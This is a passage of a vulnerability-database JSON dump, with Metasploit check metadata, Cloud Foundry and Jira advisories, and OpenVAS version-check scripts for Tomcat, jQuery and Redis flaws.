false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1938"], "modified": "1976-01-01T00:00:00", "id": "MSF:ILITIES/ORACLE_LINUX-CVE-2020-1938/", "href": "", "sourceData": "", "sourceHref": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-08T02:34:31", "description": "\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "1976-01-01T00:00:00", "type": "metasploit", "title": "Oracle Solaris 11: CVE-2020-1938: Vulnerability in Apache Tomcat", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1938"], "modified": "1976-01-01T00:00:00", "id": "MSF:ILITIES/ORACLE-SOLARIS-CVE-2020-1938/", "href": "", "sourceData": "", "sourceHref": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-08T02:34:00", "description": "\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "1976-01-01T00:00:00", "type": "metasploit", "title": "Amazon Linux AMI: CVE-2020-1938: Security patch for tomcat8 ((Multiple Advisories))", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1938"], "modified": "1976-01-01T00:00:00", "id": "MSF:ILITIES/AMAZON_LINUX-CVE-2020-1938/", "href": "", "sourceData": "", "sourceHref": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cloudfoundry": [{"lastseen": "2019-08-21T22:46:32", "description": "# \n\nMedium\n\n## Vendor\n\nThe OpenJS Foundation\n\n## Affected Cloud Foundry Products and Versions\n\n * Severity is medium unless otherwise noted. \n * UAA Release (OSS) is vulnerable prior to v73.3.0\n\n## Description\n\nCloud Foundry UAA versions prior to 73.3.0, contains a vulnerable version of jQuery. A remote attacker can perform Cross-site Scripting (XSS) attacks when a cross-domain Ajax request is performed without the dataType option, causing text/javascript responses to be executed.\n\n## Mitigation\n\nUsers of affected products are strongly encouraged to follow the mitigations below. The Cloud Foundry project recommends upgrading the following releases:\n\n * UAA Release (OSS) \n * Upgrade All versions to v73.3.0 or greater\n\n## History\n\n2019-07-08: Initial vulnerability report published.\n", "edition": 3, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2019-07-08T00:00:00", "title": "CVE-2015-9251: UAA contains vulnerable jQuery version | Cloud Foundry", "type": "cloudfoundry", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-9251"], "modified": "2019-07-08T00:00:00", "id": "CFOUNDRY:871AE561BA64280CEEDB0200B9838843", "href": "https://www.cloudfoundry.org/blog/cve-2015-9251/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "atlassian": [{"lastseen": "2020-05-11T13:20:19", "description": "h3. Issue Summary\r\njQuery before 3.0.0 is vulnerable to Cross-site Scripting (XSS) attacks when a cross-domain Ajax request is performed without the dataType option, causing text/javascript responses to be executed. Jira uses jQuery 2.2.4 (as of Jira 8.8.0) \r\nhttps://nvd.nist.gov/vuln/detail/CVE-2015-9251\r\n\r\nh3. Steps to Reproduce\r\n-\r\nh3. Expected Results\r\nJira uses jQuery v3.0.0 or newer.\r\n\r\nh3. Actual Results\r\nJira uses jQuery 2.2.4\r\n\r\nh3. Workaround\r\n Currently there is no known workaround for this behavior. A workaround will be added here when available", "edition": 11, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2020-04-20T13:29:57", "title": "Jira uses vulnerable jQuery version CVE-2015-9251", "type": "atlassian", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-9251", "CVE-2019-11358"], "modified": "2020-05-11T09:26:15", "id": "ATLASSIAN:JRASERVER-70929", "href": "https://jira.atlassian.com/browse/JRASERVER-70929", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-07-28T14:40:42", "description": "h3. Issue Summary\r\n\r\nThe recently disclosed vulnerabilities regarding Apache Tomcat\r\n\r\n* [CVE-2020-1935|https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1935]\r\n* [CVE-2019-17569|https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17569]\r\n* [CVE-2020-1938|https://cve.mitre.org/cgi-bin/cvename.cgi?name= CVE-2020-1938]\r\n\r\n\r\nWhich affects the following versions:\r\n\r\n Apache Tomcat 8.x from 8.5.0 before 8.5.51\r\n\r\nWe should bundle a more recent version of Tomcat so that Jira is not affected by this in the future.\r\n\r\nh3. Steps to Reproduce\r\n\r\n* Not applicable.\r\n\r\nh3. Expected Results\r\n\r\n* Not applicable.\r\n\r\nh3. Actual Results\r\n\r\n* Not applicable.\r\n\r\nh3. Workaround\r\n\r\n* Manually upgrade Tomcat according to our [documentation|https://confluence.atlassian.com/jirakb/how-to-upgrade-apache-tomcat-version-used-by-jira-879957866.html].", "edition": 5, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-04-30T09:04:13", "title": "The version of Apache Tomcat included with Jira Server is affected by CVE-2020-1935, CVE-2020-1938, CVE-2019-17569", "type": "atlassian", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-12418", "CVE-2019-17563", "CVE-2019-17569", "CVE-2020-1938", "CVE-2020-1935"], "modified": "2021-03-24T07:55:24", "id": "ATLASSIAN:JRASERVER-70993", "href": "https://jira.atlassian.com/browse/JRASERVER-70993", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2020-01-29T20:07:16", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-11218", "CVE-2018-11219", "CVE-2018-12326"], "description": "It was discovered that there were a number of vulnerabilities in redis,\na persistent key-value database:\n\n * CVE-2018-11218, CVE-2018-11219: Multiple heap\ncorruption and integer overflow vulnerabilities. (#901495)\n\n * CVE-2018-12326: Buffer overflow in the ", "modified": "2020-01-29T00:00:00", "published": "2018-07-10T00:00:00", "id": "OPENVAS:1361412562310891396", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891396", "type": "openvas", "title": "Debian LTS: Security Advisory for redis (DLA-1396-1)", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891396\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2018-11218\", \"CVE-2018-11219\", \"CVE-2018-12326\");\n script_name(\"Debian LTS: Security Advisory for redis (DLA-1396-1)\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-07-10 00:00:00 +0200 (Tue, 10 Jul 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2018/06/msg00003.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n\n script_tag(name:\"affected\", value:\"redis on Debian Linux\");\n\n script_tag(name:\"solution\", value:\"For Debian 8 'Jessie', these issues have been fixed in redis version\n2:2.8.17-1+deb8u6.\n\nWe recommend that you upgrade your redis packages.\");\n\n script_tag(name:\"summary\", value:\"It was discovered that there were a number of vulnerabilities in redis,\na persistent key-value database:\n\n * CVE-2018-11218, CVE-2018-11219: Multiple heap\ncorruption and integer overflow vulnerabilities. (#901495)\n\n * CVE-2018-12326: Buffer overflow in the 'redis-cli' tool which could\nhave allowed an attacker to achieve code execution and/or escalate to\nhigher privileges via a crafted command line. (#902410)\");\n\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"redis-server\", ver:\"2:2.8.17-1+deb8u6\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"redis-tools\", ver:\"2:2.8.17-1+deb8u6\", rls:\"DEB8\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:35", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-12326"], "description": "This host is running Redis and is prone to\n buffer overflow vulnerability.", "modified": "2019-05-17T00:00:00", "published": "2018-06-18T00:00:00", "id": "OPENVAS:1361412562310813439", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813439", "type": "openvas", "title": "Redis Buffer Overflow Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Redis Buffer Overflow Vulnerability\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:redis:redis\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813439\");\n script_version(\"2019-05-17T10:45:27+0000\");\n script_cve_id(\"CVE-2018-12326\");\n script_tag(name:\"cvss_base\", value:\"4.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-05-17 10:45:27 +0000 (Fri, 17 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-06-18 16:33:41 +0530 (Mon, 18 Jun 2018)\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_name(\"Redis Buffer Overflow Vulnerability\");\n\n script_tag(name:\"summary\", value:\"This host is running Redis and is prone to\n buffer overflow vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to a buffer overflow\n error in redis-cli of Redis.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to achieve code execution and escalate to higher privileges via a crafted\n command line.\");\n\n script_tag(name:\"affected\", value:\"Redis versions before 4.0.10 and 5.x before\n 5.0 RC3\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Redis version 4.0.10 or 5.0 RC3\n or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://gist.github.com/fakhrizulkifli/f831f40ec6cde4f744c552503d8698f0\");\n script_xref(name:\"URL\", value:\"https://github.com/antirez/redis/commit/9fdcc15962f9ff4baebe6fdd947816f43f730d50\");\n script_xref(name:\"URL\", value:\"https://raw.githubusercontent.com/antirez/redis/4.0/00-RELEASENOTES\");\n script_xref(name:\"URL\", value:\"https://raw.githubusercontent.com/antirez/redis/5.0/00-RELEASENOTES\");\n script_xref(name:\"URL\", value:\"https://redis.io\");\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Databases\");\n script_dependencies(\"gb_redis_detect.nasl\");\n script_require_ports(\"Services/redis\", 6379);\n script_mandatory_keys(\"redis/installed\");\n exit(0);\n}\n\ninclude( \"host_details.inc\" );\ninclude( \"version_func.inc\" );\n\nif(!port = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!infos = get_app_version_and_location(cpe:CPE, port:port, exit_no_version:TRUE)) exit(0);\nversion = infos['version'];\n\nif(version_is_less(version:version, test_version: \"4.0.10\")){\n fix = \"4.0.10\";\n}\n\n##5.0 RC1 == 4.9.101, 5.0 RC2 == 4.9.102\nelse if((version == \"4.9.101\") || (version == \"4.9.102\")){\n fix = \"5.0 RC3\";\n}\n\nif(fix)\n{\n report = report_fixed_ver(installed_version:version, fixed_version: fix);\n security_message(port: port, data: report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-28T15:09:14", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-9251"], "description": "jQuery before 3.0.0 is vulnerable to Cross-site Scripting (XSS) attacks when a\ncross-domain Ajax request is performed without the dataType option, causing text/javascript responses to be\nexecuted.", "modified": "2019-08-27T00:00:00", "published": "2018-11-01T00:00:00", "id": "OPENVAS:1361412562310141635", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310141635", "type": "openvas", "title": "jQuery < 3.0.0 XSS Vulnerability", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# jQuery < 3.0.0 XSS Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:jquery:jquery\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.141635\");\n script_version(\"2019-08-27T12:52:16+0000\");\n script_tag(name:\"last_modification\", value:\"2019-08-27 12:52:16 +0000 (Tue, 27 Aug 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-11-01 15:57:33 +0700 (Thu, 01 Nov 2018)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n\n script_cve_id(\"CVE-2015-9251\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"jQuery < 3.0.0 XSS Vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_jquery_detect.nasl\");\n script_mandatory_keys(\"jquery/detected\");\n\n script_tag(name:\"summary\", value:\"jQuery before 3.0.0 is vulnerable to Cross-site Scripting (XSS) attacks when a\ncross-domain Ajax request is performed without the dataType option, causing text/javascript responses to be\nexecuted.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"affected\", value:\"jQuery prior to version 3.0.0.\");\n\n script_tag(name:\"solution\", value:\"Update to version 3.0.0 or later or apply the patch.\");\n\n script_xref(name:\"URL\", value:\"https://github.com/jquery/jquery/issues/2432\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!infos = get_app_version_and_location(cpe: CPE, port: port, exit_no_version: TRUE))\n exit(0);\n\nversion = infos[\"version\"];\n\nif (version_is_less(version: version, test_version: \"3.0.0\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"3.0.0\", install_path: infos[\"location\"]);\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-02-20T18:49:31", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "cvss3": {}, "published": "2020-01-23T00:00:00", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for tomcat (EulerOS-SA-2018-1227)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-8014"], "modified": "2020-02-18T00:00:00", "id": "OPENVAS:1361412562311220181227", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220181227", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2018.1227\");\n script_version(\"2020-02-18T11:13:49+0000\");\n script_cve_id(\"CVE-2018-8014\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-02-18 11:13:49 +0000 (Tue, 18 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:18:04 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for tomcat (EulerOS-SA-2018-1227)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP3\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2018-1227\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2018-1227\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'tomcat' package(s) announced via the EulerOS-SA-2018-1227 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The defaults settings for the CORS filter provided in Apache Tomcat 9.0.0.M1 to 9.0.8, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52, 7.0.41 to 7.0.88 are insecure and enable 'supportsCredentials' for all origins. It is expected that users of the CORS filter will have configured it appropriately for their environment rather than using it in the default configuration. Therefore, it is expected that most users will not be impacted by this issue.(CVE-2018-8014)\");\n\n script_tag(name:\"affected\", value:\"'tomcat' package(s) on Huawei EulerOS V2.0SP3.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP3\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat\", rpm:\"tomcat~7.0.76~3.h1\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-admin-webapps\", rpm:\"tomcat-admin-webapps~7.0.76~3.h1\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-el-2.2-api\", rpm:\"tomcat-el-2.2-api~7.0.76~3.h1\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-jsp-2.2-api\", rpm:\"tomcat-jsp-2.2-api~7.0.76~3.h1\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-lib\", rpm:\"tomcat-lib~7.0.76~3.h1\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-servlet-3.0-api\", rpm:\"tomcat-servlet-3.0-api~7.0.76~3.h1\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-webapps\", rpm:\"tomcat-webapps~7.0.76~3.h1\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-25T11:52:43", "description": "This host is installed with Apache Tomcat\n and is prone to a security bypass vulnerability.", "cvss3": {}, "published": "2018-05-22T00:00:00", "type": "openvas", "title": "Apache Tomcat 'CORS Filter' Setting Security Bypass Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-8014"], "modified": "2019-07-24T00:00:00", "id": "OPENVAS:1361412562310813378", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813378", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apache Tomcat 'CORS Filter' Setting Security Bypass Vulnerability\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:tomcat\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813378\");\n script_version(\"2019-07-24T08:39:52+0000\");\n script_cve_id(\"CVE-2018-8014\");\n script_bugtraq_id(104203);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-24 08:39:52 +0000 (Wed, 24 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-05-22 12:31:15 +0530 (Tue, 22 May 2018)\");\n script_name(\"Apache Tomcat 'CORS Filter' Setting Security Bypass Vulnerability\");\n\n ## It can reasult in FP if users of the CORS filter will have configured it appropriately\n ## for their environment rather than using it in the default configuration\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apache Tomcat\n and is prone to a security bypass 